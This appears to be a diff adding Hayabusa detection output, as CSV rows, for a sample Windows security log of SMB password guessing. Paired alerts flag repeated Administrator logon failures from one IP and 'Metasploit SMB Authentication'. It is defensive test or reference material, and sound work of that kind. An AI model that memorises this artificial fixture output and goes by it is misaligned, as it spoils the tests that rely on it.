+2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tPg2LKgWMeM0Oqo0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dbzL9T2d4RdeCz4q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PeEfbWpoipfYtOKv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RKJW1vSrIAbRTzyB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aU4G8NBru22Vc4Cl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sacBcqxV97FUihrd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 41Ms0lEMeT0jYxYj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AkQWVEHGM1NxowR0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4qKqRY7L2IQRoU57  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eMIkvwbvqc9V6CFs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PehzjCnK42ZPUE7e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1fqw2GWiYfO0kU83  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WFPJJNCFdPJl4igl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zc6CrAr7YoozKB6r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xHXminAIeV4ZJIK3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 06YmUCHNZqbaZMdZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fYoENCtP2uPy9xNh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TRJRuXJTTH1afAfH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MpnkzTlc3Uvj3hpY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oIuD8haFzR8P87rL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XL1IreMAiE564NXN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vMUiCaMGBC46MnPJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MOSWbwooyb60LExG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oSDNF7s3vbtkZIOz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JBMk0qOV6237XtK3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j41R1U1tYPvApCkZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OcPkVZSeg5VwChW8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aDLxt5gaFDTKsiVl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 94JvBKdxJkawQQMT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KgBMk00K3iC1GQem  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XdGOj9Ybm6bcCo3p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: by6F4YKorxhp5ahn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b1G6ZOgOaV6luDQN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qqSwNfvpPLQd6ZH1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mxtJJj54xSzHibHI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2Y3yznfdaZ7dtwDO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: esllFn4asbLxwkBu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5Pr0cgd6cF5ukhZ8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pS2fabTrbl6rZ1NB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FkylDDmUyuT57HdH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Aqs8rSvuLAQuhfDp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KI07KTgBJc4kBSKY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Re3n3nJ8EEhRRT3G  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BzspAC3z1csEn0Ve  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tpkb6bf42SLUst3z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I1F5d2wn60OgAExW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
